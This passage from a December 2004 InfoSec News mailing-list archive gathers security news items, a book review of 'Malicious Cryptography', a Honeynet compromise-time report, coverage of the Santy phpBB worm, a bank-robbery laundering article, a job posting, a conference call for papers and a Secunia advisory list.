days, you knew which communications circuits to watch," he said. "We knew that most of it was high-frequency anyway, so we had the place surrounded by high-frequency intercepts. Those frequencies weren't going anywhere, so you just sat there with the headphones on and listened." The problem now, Mr. Bamford said, is that the corridors for communication have become infinite and accessible to everyone. "You just don't sit and listen to a particular channel," he said. "It's all over the place. It's a 'needle in the haystack' problem that you have." Russ Rogers, a former Arab linguist with the National Security Agency and the Defense Information Systems Agency, said he feared security agencies might not realize how dense the haystack has become. "We've become a little bit arrogant," said Mr. Rogers, the author of a new book, "Hacking a Terror Network: The Silent Threat of Covert Channels," [1] which uses fictional situations to highlight the ways terrorists can communicate secretly online. "We feel like we created the Internet, that we've mastered the network," Mr. Rogers said. "But we're not paying attention to how it's being used to work against us." [1] http://www.amazon.com/exec/obidos/ASIN/1928994989/c4iorg From isn at c4i.org Wed Dec 22 03:23:59 2004 From: isn at c4i.org (InfoSec News) Date: Wed Dec 22 03:40:53 2004 Subject: [ISN] REVIEW: "Malicious Cryptography", Adam L. Young/Moti Yung Message-ID: Forwarded from: "Rob, grandpa of Ryan, Trevor, Devon & Hannah" BKMLCRPT.RVW 20041012 "Malicious Cryptography", Adam L. Young/Moti Yung, 2004, 0-7645-4975-8, U$45.00/C$64.99/UK#29.99 %A Adam L. Young %A Moti Yung %C 5353 Dundas Street West, 4th Floor, Etobicoke, ON M9B 6H8 %D 2004 %G 0-7645-4975-8 %I John Wiley & Sons, Inc. %O U$45.00/C$64.99/UK#29.99 416-236-4433 fax: 416-236-4448 %O http://www.amazon.com/exec/obidos/ASIN/0764549758/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/0764549758/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/0764549758/robsladesin03-20 %P 392 p. %T "Malicious Cryptography: Exposing Cryptovirology" Both the foreword and the introduction are turgid, and bloated with excessive verbiage, while never giving a clear indication of what the book is actually about. Does it have to do with viruses at all? Is it about the use of cryptography in any kind of criminal or unethical endeavour? The initial material does not make this clear. Occasionally the text becomes so flowery that sentences have no meaning at all. The lack of clarity is not assisted by the creation of new and idiosyncratic terms, or the use of existing jargon in non-standard ways. In chapter one, a fictional and glacially slow trip through the mind of a virus writer, we are told that self-checking modules that some programs use to detect modification in their own code are "beneficial Trojans" or "battleprogs." The term multipartite is defined in such a way that merely copying the program into RAM (Random Access Memory) qualifies: that would make every virus ever written, and every program, for that matter, multipartite. "Kleptogram" is used throughout the book, but only defined (and not very clearly) in the last chapter. Releasing any virus is seen as having something to do with "information warfare," which would agree with many sensationalistic journalists who have written on the subject, but would probably surprise legitimate experts such as Dorothy Denning. "Virology" itself (and the more specialized "cryptovirology") is an excellent term for computer virus research--it just isn't used very widely. There is a glossary: it defines commonly known terms and does not define the specialized jargon that the authors have used. The confusion is not limited to terminology. There is no technical sense to the statement (on page twenty five) that a certain layer of the network stack is "high enough to facilitate rapid software development" (compilers don't care where their software ends up) but low enough to escape detection (files, processes, and network packets are all visible). A disk locking program, as described, would have no effect on the operations of a remote access trojan. And, of course, our fictional protagonist is constantly creating new versions of the mythical "undetectable" virus, without there being any indication of how this might be done. (The fictional aspects of the book are not limited to chapter one. Throughout the work, examples are taken from fiction: it certainly feels like more illustrations come from works like "Shockwave Rider" and "Alien" than from real life.) Chapter two starts to get a bit better. The authors introduce the idea of using asymmetric cryptography in order to create a virus (or other piece of malware) that, rather than merely destroying data, provides for a reversible denial of access to data, and therefore the possibility of extortion. The idea is academically interesting, but there might be a few practical details to be worked out. Chapter three seems to move further into the academic realm, with an interesting overview of issues in regard to the generation of random, or pseudorandom, numbers. There is also an initial exploration of anonymity, with an insufficient description of "mix networks" (onion routing being one example). A little more discussion of anonymity starts off chapter four, which then moves on to another use of asymmetric cryptography in malware: the "deniable" recovery of stolen information, via distribution over public channels. Cryptocounters, which could be used to store generational or other information about the spread of a virus, without such data being accessible to virus researchers, are discussed in chapter five. Chapter six looks at aspects of searching for, and retrieving, information without disclosing the fact that an exploration is occurring. However, much of the material appears to be some highly abstract solutions rather desperately in search of problems. Varying the extortion scenario, chapter seven proposes a viral network that could retaliate for disinfection of any node by threatening disclosure of sensitive information. While the analysis of the structure of the attack is sound, the assumption of payoffs, coercion, and undetectability leave something to be desired. Chapter eight examines the standard antiviral processes (signature scanning, activity monitoring, and change detection) with some miscellaneous explorations, although the discussion is prejudiced by the assumption that we are dealing with traditional (and no longer widely used) file infectors. Trojan horse programs are not terribly well defined in chapter nine. (I was amused at the disclaimer given when the issue of "salami" scams was raised: I have found reliable evidence for only one, extremely minor, instance of the device.) Subliminal channels are means of passing information via cryptographic keys, but chapter ten is not very clear in regard to their use. SETUPs (Secretly Embedded Trapdoor with Universal Protection) are discussed in chapter eleven, although the authors appear to admit that this is only an academic exercise: there are easier attacks. Another form is discussed in chapter twelve. Does this book fulfill its function? That rather depends on what the intent of the work was, which is far from clear. Was the text intended to be a reference for some interesting topics in cryptography? The verbiage and lack of structure would be a difficulty for those seeking to use it so. Is the publication directed at the general public? The audience of those who read number theoretical manuscripts for fun might be a bit limited. (I've got to say that "Algebraic Aspects of Cryptography" [cf. BKALASCR.RVW] was an easier read, and it makes no pretence of being other than an scholastic paper.) Is the volume supposed to be a serious warning against new forms of malware? The inclusion of a great deal of extraneous content and the lack of clear explanations or examples of some basic concepts limit the value of the work in this regard. In addition, much of the material concentrates on building more malign malware, rather than dealing with defence against it. (I'm not too worried about vxers getting ideas from Young and Yung: implementing crypto properly is a painstaking task, and from almost twenty years experience of studying blackhat products and authors, I'm fairly sure there'd be lots of bugs in what might be released. On the other hand, somebody in a government office might be working on Magic Lantern version 3.01 ...) For those seriously involved in the study of viruses and malware this book has some interesting points that should be examined, but little of practical use. For ardent students of cryptography, the work notes some interesting areas of work. For those seeking examples of writing styles to emulate, please look elsewhere. copyright Robert M. Slade, 2004 BKMLCRPT.RVW 20041012 ====================== (quote inserted randomly by Pegasus Mailer) rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu I'm out of my mind, but feel free to leave a message. http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade From isn at c4i.org Thu Dec 23 04:13:07 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:18 2004 Subject: [ISN] Blood bank fears laptop heist ID theft Message-ID: Forwarded from: Eric Hacker One has to wonder how much more valuable that laptop is on the black market now that it is known to contain names and SSNs. We have ID counts and valuable configuration information being distributed in the news. Even is this was stolen by an addict, his fence probably keeps up with the news. On Wed, 22 Dec 2004 01:35:08 -0600 (CST), InfoSec News wrote: > http://news.com.com/Blood+bank+fears+laptop+heist+ID+theft/2100-1029_3-5500114.html [...] > Delta's director of human resources, John O'Neill, said two layers > of security could still protect the personal information despite the > computer's theft. The first is Microsoft's standard Windows password > required to launch the operating system, and the second is the > series of steps required to launch what O'Neill described as an > "esoteric, unique" database, created by a software provider he > declined to name. Now this spells out exactly what one needs to know in order to extract the information. Certainly makes putting a value on the laptop that much easier for someone who thinks they can get at the information inside. Now, I am not saying that this is a bad law. I think it has a lot of benefits for the consumer. What I am saying is that there are consequences to this law, especially the disclosure of details to the press by stressed out executives, that do not help protect the confidentiality of the stolen information. Obviously, one needs to have a personal information disclosure incident response plan in place before a disclosure occurs to prevent this issue. Obviously, an organization that well organized would probably be doing a better job of protecting the data in the first place.... Peace, Eric Hacker From isn at c4i.org Thu Dec 23 04:13:44 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:23 2004 Subject: [ISN] Linux lasting longer against Net attacks Message-ID: http://news.zdnet.com/2100-1009_22-5501278.html By Robert Lemos CNET News.com December 22, 2004 Unpatched Linux systems are surviving longer on the Internet before being compromised, according to a report from the Honeynet Project released this week. The data, from a dozen networks, showed that the average Linux system lasts three months before being compromised, a significant increase from the 72 hours life span of a Linux system in 2001. Unpatched Windows systems continue to be compromised more quickly, sometimes within minutes, the Honeynet Project report stated [1]. The results are probably due to two trends, said Lance Spitzner, president of Honeynet, which develops software for deploying computer systems as bait for online attackers. The default installations of new Linux systems are much more secure than previous versions of the open-source operating system, he said. Secondly, attackers seem to be much more concentrated on Windows systems than on Linux systems, and on attempting to fool desktop users, of which the vast majority use Windows. "Everybody is focused on Windows," Spitzner said. "There is more money (for an attacker) to be made on the Windows systems." The study is the latest data on the relative security of Linux systems versus Microsoft Windows. Last week, students found dozens of flaws in software that runs on Linux systems, and a research report stated that a thorough analysis of the Linux kernel turned up hundreds of flaws. However, in relative terms, those numbers are low compared to commercial applications. Honeynets, a term coined by the project, are networks of computers that are placed on the Internet with the expectation that they will be compromised by attackers. The networks are heavily monitored, and the data is used to research the latest tactics of online miscreants. While some of the Windows XP systems on the honeynets used for the latest study were compromised within minutes of being placed on the Internet, newer versions of the Linux operating system from Red Hat failed to be compromised by random attacks for more than two months. Debbie Fry Wilson, director of product management for the security response center at Microsoft, told CNET News.com that the company's latest operating system is more secure than the report suggests. "While it is not clear which version of Windows was used during the study, we feel that a Windows XP SP2 configuration with the Windows firewall enabled is the most resilient client operating system available in the market and can withstand attack much longer," Wilson said. "We are pleased that the report indicates that two Windows-based honeynets in Brazil withstood attack for several months. However, we are not certain that the report provides conclusive data based on a controlled and scientific study comparing the two operating systems." Every Windows system compromised during the study had its security breached by a worm. However, Spitzner stressed that the Honeynet Project does not have enough Windows systems deployed to offer meaningful data on that operating system's security. Moreover, the report does not specify what version of Windows XP had been running on the systems that had been compromised and whether any Service Pack upgrades had been installed. The study did find that more recent versions of the Linux operating system lasted longer on the Internet without patching. [1] http://www.honeynet.org/papers/index.html From isn at c4i.org Thu Dec 23 04:15:00 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:26 2004 Subject: [ISN] Google smacks down Santy worm Message-ID: http://www.nwfusion.com/news/2004/1222googlsmack.html By Paul Roberts IDG News Service 12/22/04 Web search engine company Google is blocking efforts by a new Internet worm to use its search engine to find vulnerable computers on the Internet, the company announced late Tuesday. Google is blocking searches launched by Santy.A, a new Internet worm that targets servers running phpBB, a popular electronic bulletin board software package, according to a statement from the company. Without any native ability to scan for vulnerable computers, Google's action halted Santy.A's spread, according to anti-virus companies. Santy.A targets servers running phpBB. Anti-virus companies first detected the worm Tuesday, though it may have been spreading silently well before that, according to Johannes Ullrich, chief technology officer at The SANS Institute's Internet Storm Center. The worm used a vulnerability in phpBB, an open source software product that is managed by the phpBB Group, to spread across the Internet, infecting computer servers that host online bulletin boards and defacing those sites with the words "This site is defaced!!! NeverEverNoSanity WebWorm." A phpBB component called viewtopic.php allows malicious commands to be passed to and executed on servers that run a vulnerable version of the phpBB software. Secunia, a Copenhagen-based security company, first reported the vulnerability on Nov. 19. An updated version of phpBB software that fixes the flaw was released on Nov. 18. Estimates of the impact of the Santy worm vary widely. Searches on a beta version of Microsoft's MSN Search feature for the text used to deface sites returned more than 30,000 hits. However, identical searches on other engines, including the official MSN Search engine, Yahoo and Google search engines returned far fewer hits, ranging from 785 (MSN) to 2,030 (Yahoo). Using searches for telltale signs of infection, such as defacement text, is an inexact way to determine the actual number of Santy infections, said Ullrich. "Santy will only deface sites if it can overwrite files, and it may not always be able to do that based on the configuration of the Web server (running phpBB)," he said. Also, an analysis of the Santy code revealed that the worm spread quietly for a while, infecting phpBB servers but not overwriting files and defacing the bulletin boards, Ullrich said. The Santy worm marked some firsts, including the use of a popular search engine as part of a worm's spreading mechanism. But the lessons to be learned from Santy's spread are already well established: keep on top of software patches and "harden" the configuration of public-facing servers by preventing users from being able to take unnecessary actions, such as overwriting files, he said. From isn at c4i.org Thu Dec 23 04:15:25 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:32 2004 Subject: [ISN] Robbers' quandary: Getting rid of the cash Message-ID: http://news.bbc.co.uk/1/hi/business/4117961.stm By Gavin Stamp BBC News business reporter 22 December, 2004 Pulling off one of the largest and most daring cash robberies of all time is one thing. Disposing successfully of the loot and enjoying the benefits is another matter. For the criminals who have made off with more than ?20m from the headquarters of Northern Bank in Belfast, the problems may only just be beginning. Firstly, they will have to contend with the huge worldwide publicity that their heist has generated. 'Massive headache' Police in the United Kingdom and across Europe will be hot on their trail while shopkeepers from Ballymena to Brighton will be alert to any large or unusual purchases for the next few weeks. Secondly, the sheer size of the robbers' hoard could turn out to be a millstone around their necks. Getting rid of ?20m without causing huge suspicion is likely to tax even the most resourceful and determined of criminal minds. Not only do the stolen notes each have their own serial number, making them easy to identify but the majority are denominated in Northern Ireland currency. Although this is accepted throughout the United Kingdom, far fewer notes of this type tend to be in circulation outside Northern Ireland, making any effort to disperse them in England more risky. "They have a massive headache," says John Horan, a money laundering expert with accountants Harbinson Mulholland. "To some extent, they have been the victims of their own success." Furthermore, the laws governing reporting of suspicious money flows have been tightened up over the past two years, making it far harder for the criminals to discreetly invest their loot in a piece of real estate or an Old Master. Suspicious minds While banks have always had a legal responsibility to report suspicions of potential money laundering, the Proceeds of Crime Act passed in 2003 has extended this obligation to a whole raft of businesses and professionals. "If they're thinking of buying property, that's a bad idea because property developers, estate agents and conveyancing lawyers are regulated and all have an obligation to report their suspicions," says Mr Horan. "Thinking of buying a Matisse or a nice Rembrandt? That's a bad idea too because high value dealers such as auction houses are also regulated." The robbers still have a number of options, money laundering experts agree, although they are limited. If they plan to keep the money within the United Kingdom without resorting to burying it, setting up a front company is the most likely option. "They can set up a fake company which can be used to nominally provide services and invoices for those services," says Trevor Mascarenhas, a partner at Phillipsohn Crawfords Berwald, a law firm specialising in fraud and money laundering. "They can then take the cash and put it through the system, paying tax on what they purport to provide and try to legitimise the money." Overseas options To do this successfully, says Mr Horan, they would need the assistance of an expert money launderer who would expect to take a major cut of the proceeds. More likely, however, is that the robbers will attempt to smuggle the money out of United Kingdom in multiple consignments so as not to jeopardise the entire haul. Drug laundering organisations in South America and Russian criminal gangs operating across Europe may provide a ready conduit for the money, channelling it through it banks willing not to ask too many questions. According to Ian Hopkins, a senior consultant with corporate investigators Carratu International, Colombia is one destination the robbers may consider. "There are places like that which are not too concerned where the money comes from. There are banks which will take their 2% to 3% and deal with the rest of the money." The money could even ultimately find its way back into the British economy through offshore businesses and accounts. Whatever the fate of the money, most experts believe the robbers may have taken on more than they can chew. "I would be very surprised if they expected to steal ?20m," says Mr Hopkins. "It is like the Great Train Robbery. They are likely to be surprised and not a little panicked about how much they have got." From isn at c4i.org Thu Dec 23 04:15:50 2004 From: isn at c4i.org (InfoSec News) Date: Thu Dec 23 04:30:35 2004 Subject: [ISN] [infowarrior] - Opening for USAF Chief Scientist Message-ID: ---------- Forwarded message ---------- Date: Wed, 22 Dec 2004 13:57:57 -0500 From: Richard Forno To: Richard Forno Subject: [infowarrior] - Opening for USAF Chief Scientist From: Gene Spafford Season's Greetings, everyone! Please share this with your colleagues, and repost to mailing lists where you think it will be seen by appropriate candidates. I am passing on information about a position where a person with the right qualifications can make a big difference in computing R&D, including issues of cybersecurity, data collection/fusion, HCI, communications, real-time operating systems, pattern recognition, reliable computing, and a host of other areas. The Air Force Laboratory, Information Directorate, has an opening for its chief scientist. The URL for the official announcement is . I am enclosing a portion of the job description and qualifications, below; see the official announcement for full details. The short form of the job description starts off "Serves as the Air Force principal scientific and primary authority for the technical content of the S&T portfolio related to information systems and science for the advancement and application of information systems science and technology...." (The position is limited to US citizens and nationals by its nature.) I have been involved with the folks in AFRL/IF for several years now. They have some outstanding researchers and facilities, including a great new building and lab space, and they are working on really important (and difficult!) problems that have impacts on national defense, law enforcement, university research and the private sector. The main facility is located in Rome, NY. This is a beautiful area of the country (especially if you enjoy a few months of real winter with skiing, skating, and snowball fights :-) with affordable housing and relaxed surroundings. The position pays well, and is a senior appointment. The job duties description includes the following: The Information Directorate conducts USAF research, exploratory and advanced development activities in knowledge based technologies, computer science and technology, collaborative environments, signal processing, information fusion and exploitation, command & control decision support, aerospace connectivity, networking, information management and cyber operations. The Chief Scientist provides scientific leadership, advice and guidance throughout the Laboratory on research plans and programs in core area and related technologies. The Chief Scientist serves to focus research and development efforts associated with the interrelated group of technologies and strengthen the in-house activities of the laboratory. Conceives, plans, and advocates major research and development activities; consults with the laboratory director, the laboratory chief scientist and the technology director and staff concerning the total research program and results; monitors and guides the quality of scientific and technical resources; and provides expert technical consultation to other AFRL directorates, DOD agencies, universities and industry. Position requires an internationally recognized authority in information systems science and technology with the ability to conceive and conduct advanced research and development. The incumbent must make significant contributions to the advancement of knowledge in the field as evidenced by numerous important scientific publications and by citation of the work by others. Qualifications include the following: The candidate must have at least three years of specialized experience within the broad area of information systems science and technology as applied to areas such as; battlespace awareness, dynamic planning and execution, and global information enterprise with specific research experience in areas that support these broad topics such as information fusion and exploitation, predictive battlespace awareness, information assurance, cyber operations, communications & networks, effects based operations, collaborative enterprises, modeling and simulation, intelligent agents, machine reasoning, information management, or intelligent information systems. At least one year of this research experience must demonstrate that the candidate has leadership experience in planning and executing difficult research activities resulting in outstanding attainments in information systems science and technology; or planning and executing specialized programs of national significance in exploratory and advanced development of information systems science and technology. From isn at c4i.org Fri Dec 24 03:14:45 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:33:51 2004 Subject: [ISN] Inside Security Administrator UPDATE--December 23, 2004 Message-ID: ======================= This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers? Web sites and show your support for Security Administrator UPDATE. Debunking the Top 5 Myths of Outsourcing Email Security http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsB0Ai Free Patch Management White Paper from St. Bernard Software http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsC0Aj ======================= 1. What's New in the Latest Issue January 2005 Issue - Focus: Security Toolkit and Training - Feature: The Auditor Security Collection 2. New Additions to the Online Article Archive January 2004 Issue - Focus: Document Security - Features - Access Denied ==== Sponsor: Debunking the Top 5 Myths of Outsourcing Email Security ==== As spam and email-borne viruses continue to threaten the productivity and stability of email systems, enterprises are evaluating various anti-spam email security solutions including buying software or appliances for deployment in-house, or outsourcing email security to a managed service. In this free White paper, you'll find out the five most common myths surrounding the concept of outsourcing email security. Plus, you'll gain an understanding of the benefits gained from using a managed service for email security including improved protection against new email threats and attacks, lower infrastructure costs, less administrative burden, and reduced risk and complexity. Get this white paper now! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsB0Ai ======================= Security Administrator is a monthly, paid, print newsletter loaded with news and tips to help you manage, optimize, and secure your Web-enabled enterprise. Nonsubscribers can access all the newsletter content in the online article archive from the premiere issue of Security Administrator (February 2001) through the print issue released 1 year ago and featured below. In addition to receiving the monthly print newsletter, subscribers can access all the newsletter content, including the most recent issue, at the Security Administrator Web site. http://www.windowsitpro.com/windowssecurity Subscribe today and access all the issues online! https://secure.pentontech.com/nt/security/index.cfm?promocode=00wi25xxhm ======================= ==== 1. What's New in the Latest Issue ==== January 2005 Issue Focus: Security Toolkit and Training The Auditor collection of security tools can be a great start to a security toolkit, and Port Reporter is another good addition to your tool set. Security certifications can be good for you--if you pick the right ones to pursue. The following article is available at no charge to nonsubscribers for a limited time: Feature The Auditor Security Collection Use this Linux-based, self-contained tool collection as an easy-to-use, all-in-one security toolkit. --Jeff Fellinge http://www.windowsitpro.com/windowssecurity/article/articleid/44648/44648.html Subscribers have access to the entire contents of the January 2005 issue. For a list of the other articles available in this issue, visit the URL below. http://www.windowsitpro.com/windowssecurity/issues/issueid/750/index.html ======================= ==== Sponsor: Free Patch Management White Paper from St. Bernard Software ==== Successful patch management is a core component of maintaining a secure computing environment. With a growing number of patches being released by Microsoft weekly, IT administrators must be vigilant in assuring that the machines on their networks are accurately patched. Although Microsoft offers tools to assist administrators with the tasks of patching, they are often time-consuming and far from comprehensive. However there are solutions on the market that can reliably and accurately automate the tasks involved in successful patch management. In this free white paper, learn more about the patch management dilemma and patch management solutions. Download this free white paper now! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNsC0Aj ==== Announcements ==== (from Windows IT Pro and its partners) Are You "Getting By" Using Fax Machines or Relying on a Less Savvy Solution That Doesn't Offer Truly Integrated Faxing from Within User Applications? Attend this free on-demand Web seminar and learn what questions to ask when selecting an integrated fax solution, discover how an integrated fax solution is more efficient than traditional faxing methods, and learn how to select the fax technology that's right for your organization. Register now! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhA0AW Harness the Power of Active Directory Provisioning Join Active Directory expert Jeremy Moskowitz for this on-demand Web seminar. Discover the power of using Group Policy to efficiently configure and manage computers within your company to reduce administration and maximize productivity. You?ll learn how to leverage Group Policy to provision desktops, manage the provisioning process, and more. Register now! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhB0AX Best Practices for Systems Management In this free on-demand Web seminar, you?ll discover the most effective practices to monitor and manage your OSs and how they can be put into practice in your environment. Our expert panel will deliver the tips and techniques you need to improve service levels and maximize the use of your IT staff. Register now! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhC0AY Get the Entire Exchange 2003 eBook This free eBook will educate Exchange administrators and systems managers on how to best approach the migration and overall management of an Exchange Server 2003 environment. The book will focus on core issues such as configuration management, accounting, and monitoring performance with an eye toward migration, consolidation, security, and management. Get the entire eBook now! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhD0AZ ======================= ==== 2. New Additions to the Online Article Archive ==== January 2004 Issue To access this issue of Security Administrator, go to the following URL: http://www.windowsitpro.com/windowssecurity/issues/issueid/682/Index.html Focus: Document Security Set up Windows Rights Management Services to protect your documents, email messages, and Web site content. Also, learn about the Ethereal packet sniffer and certificate autoenrollment. Features The Ethereal Packet Sniffer Learn how to use this free, full-featured protocol analyzer, which has both graphical and command-line interfaces. --Jason Fossen http://www.windowsitpro.com/windowssecurity/article/articleid/40949/40949.html Windows Rights Management Services Microsoft's new Windows Rights Management Services (RMS) lets users lock down documents, email messages, and Web content like never before. --John Howie http://www.windowsitpro.com/windowssecurity/article/articleid/40951/40951.html Windows Server 2003 PKI Certificate Autoenrollment Windows Server 2003 lets you automatically enroll users and computers for certificates, including smart card?based certificates. --Jan De Clercq http://www.windowsitpro.com/windowssecurity/article/articleid/40948/40948.html Access Denied Making MBSA Ignore Patches to Disabled Services Prevent updates for disabled services and features from generating false positives on MBSA reports. --Randy Franklin Smith http://www.windowsitpro.com/windowssecurity/article/articleid/40946/40946.html Scanning for Office Updates MBSA can't scan for missing Office updates, but you can use one of two other options to do the job. --Randy Franklin Smith http://www.windowsitpro.com/windowssecurity/article/articleid/40947/40947.html ======================= ==== Events Central ==== (brought to you by Windows IT Pro) Stop the "Silent Killer" Unleashed by Spammers You're under attack from the "silent killer" trying to steal your email directory addresses through directory harvest attacks. Symptoms include sudden bursts of email activity that last only a few minutes and server deferral queues that are constantly full slowing your server performance. Register now for this free on-demand Web seminar and learn how to stop the "silent killer" in its tracks! http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNhE0Aa ====Sponsored Link ==== Data Protection from NSI and Microsoft Instant recovery and data protection solutions for Exchange and SQL servers http://list.windowsitpro.com/cgi-bin3/DM/y/eimN0MfYqv0Kma0BNdw0AM ==== Contact Us ==== About the newsletter -- letters@windowsitpro.com About technical questions -- http://www.windowsitpro.com/forums About product news -- products@windowsitpro.com About your subscription -- securityupdate@windowsitpro.com About sponsoring UPDATE -- emedia_opps@windowsitpro.com ======================= This email newsletter is brought to you by Security Administrator, the leading publication for IT professionals securing the Windows enterprise from external intruders and internal users. Subscribe today! ( http://www.secadministrator.com/rd.cfm?code=00ep254xebb ) View the Windows IT Pro Privacy policy at http://www.windowsitpro.com/aboutus/index.cfm?action=privacy Windows IT Pro is a division of Penton Media Inc. 221 East 29th Street, Loveland, CO 80538, Attention: Customer Service Department Copyright 2004, Penton Media, Inc. All Rights Reserved. From isn at c4i.org Fri Dec 24 03:15:01 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:33:53 2004 Subject: [ISN] Final Call for Papers & Workshops - BCS Asia 2005 Message-ID: Forwarded from: Anthony Zboralski Dear ISN Readers, Final Call for Papers & Workshops - BCS Asia 2005 I just wanted to remind you that this is your last chance to send your proposal to cfp2005@bellua.com (abstract must be sent today; presentation slides can be sent later.) The Call for Workshops has been extended until the 1st January 2005. Please read the detailed CFP, (we cover hotel accommodation, travel expenses and honorarium.) http://www.bellua.com/bcs2005/asia05.cfp.html 21-22 March 2005: Workshops 23-24 March 2005: Conference 21st - 24th March the largest information security conference in Asia will take place in Jakarta, Indonesia at the Hotel Borobudur. Between 400 to 600 delegates and visitors are expected. Merry Christmas and Happy New Year 2005! Anthony -- Anthony C. Zboralski PT Bellua Asia Pacific - http://www.bellua.com Bumi Daya Plaza 18th Floor, jl. Iman Bonjol No.61 Jakarta 10310 Indonesia. Phone: +62213918330 HP:+628159102495 65b1d8c7 - 6c0b b76a 51ef bfa6 c03b 97c8 af75 420c 65b1 d8c7 From isn at c4i.org Fri Dec 24 03:16:30 2004 From: isn at c4i.org (InfoSec News) Date: Fri Dec 24 03:33:56 2004 Subject: [ISN] Secunia Weekly Summary - Issue: 2004-52 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2004-12-16 - 2004-12-23 This week : 131 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: Monitor, Filter, and Manage Security Information - Filtering and Management of Secunia advisories - Overview, documentation, and detailed reports - Alerting via email and SMS Request Trial: https://ca.secunia.com/?f=s ======================================================================== 2) This Week in Brief: ADVISORIES: Two vulnerabilities have been reported in Konqueror, which can be exploited by malicious people to compromise a vulnerable system. The vendor has issued patches, which can be found in the referenced Secunia advisory below. References: http://secunia.com/SA13586/ VIRUS ALERTS: Secunia has not issued any virus alerts during the week. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA13482] Internet Explorer DHTML Edit ActiveX Control Cross-Site Scripting 2. [SA13481] PHP Multiple Vulnerabilities 3. [SA13129] Mozilla / Mozilla Firefox Window Injection Vulnerability 4. [SA13471] Adobe Reader / Adobe Acrobat Multiple Vulnerabilities 5. [SA13251] Microsoft Internet Explorer Window Injection Vulnerability 6. [SA12889] Microsoft Internet Explorer Two Vulnerabilities 7. [SA13239] phpBB Multiple Vulnerabilities 8. [SA12959] Internet Explorer HTML Elements Buffer Overflow Vulnerability 9. [SA13269] Winamp "IN_CDDA.dll" Buffer Overflow Vulnerability 10. [SA13474] Adobe Acrobat Reader "mailListIsPdf()" Function Buffer Overflow ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA13621] SurgeMail Unspecified Webmail Security Issue [SA13583] Crystal FTP Client "LIST" Buffer Overflow Vulnerability [SA13571] ArGoSoft Mail Server Script Insertion Vulnerability [SA13618] Citrix Metaframe XP Unspecified Buffer Overflow Vulnerability [SA13605] tlen URL Script Insertion Vulnerability [SA13591] WinRAR Delete File Buffer Overflow Vulnerability [SA13578] Windows Media Player ActiveX Control Two Vulnerabilities [SA13567] Google Desktop Search Exposure of Local Search Results [SA13569] GamePort Two Security Bypass Vulnerabilities UNIX/Linux: [SA13639] Red Hat update for acroread [SA13636] KDE kpdf "doImage()" Buffer Overflow Vulnerability [SA13629] Fedora update for libtiff [SA13626] Mandrake update for kdelibs [SA13622] Mandrake update for mplayer [SA13614] Red Hat update for PHP [SA13611] Fedora update for PHP [SA13608] HP-UX FTP Server Debug Logging Buffer Overflow Vulnerability [SA13607] LibTIFF Two Integer Overflow Vulnerabilities [SA13602] xpdf "doImage()" Buffer Overflow Vulnerability [SA13595] Red Hat update for XFree86 [SA13590] Mandrake update for ethereal [SA13586] KDE Konqueror Java Sandbox Security Bypass Vulnerabilities [SA13585] Gentoo update for mplayer [SA13581] Red Hat update for XFree86 [SA13568] Mandrake update for php [SA13562] Gentoo update for PHP [SA13561] Gentoo update for Ethereal [SA13559] Gentoo update for KDE kfax [SA13557] Gentoo update for phpMyAdmin [SA13542] NapShare "auto_filter_extern()" Function Buffer Overflow Vulnerability [SA13533] Bolthole Filter "save_embedded_address()" Function Buffer Overflow [SA13502] xine-lib "open_aiff_file()" Buffer Overflow Vulnerability [SA13499] Gentoo update for acroread [SA13635] Rpm Finder "web()" Buffer Overflow and Insecure File Creation [SA13624] Mandrake update for krb5 [SA13616] Gentoo update for mpg123 [SA13606] Gentoo update for Zwiki [SA13584] Debian update for xzgv [SA13580] Debian update for htget [SA13579] htget Buffer Overflow Vulnerability [SA13560] Gentoo update for kdelibs / kdebase [SA13558] Gentoo update for abcm2ps [SA13554] YAMT "id3tag_sort()" Function Vulnerability [SA13553] xlreader "book_format_sql()" Buffer Overflow Vulnerability [SA13552] Vilistextum "get_attr()" Buffer Overflow Vulnerability [SA13551] vb2c "parse()" Buffer Overflow Vulnerability [SA13550] UnRTF "process_font_table()" Buffer Overflow Vulnerability [SA13548] rtf2latex2e "ReadFontTbl()" Buffer Overflow Vulnerability [SA13547] Ringtone Tools "parse_emelody()" Function Buffer Overflow [SA13546] pgn2web "process_moves()" Buffer Overflow Vulnerability [SA13545] Pcal "getline()" and "get_holiday()" Buffer Overflow Vulnerabilities [SA13544] o3read "parse_html()" Function Buffer Overflow Vulnerability [SA13541] Mesh Viewer "Mesh::type()" Function Buffer Overflow Vulnerability [SA13539] Junkie FTP Client Two Vulnerabilities [SA13538] jpegtoavi "get_file_list_stdin()" Function Buffer Overflow Vulnerability [SA13537] jcabc2ps "switch_voice()" Buffer Overflow Vulnerability [SA13536] IglooFTP File Manipulation Vulnerabilities [SA13535] html2hdml "remove_quote()" Buffer 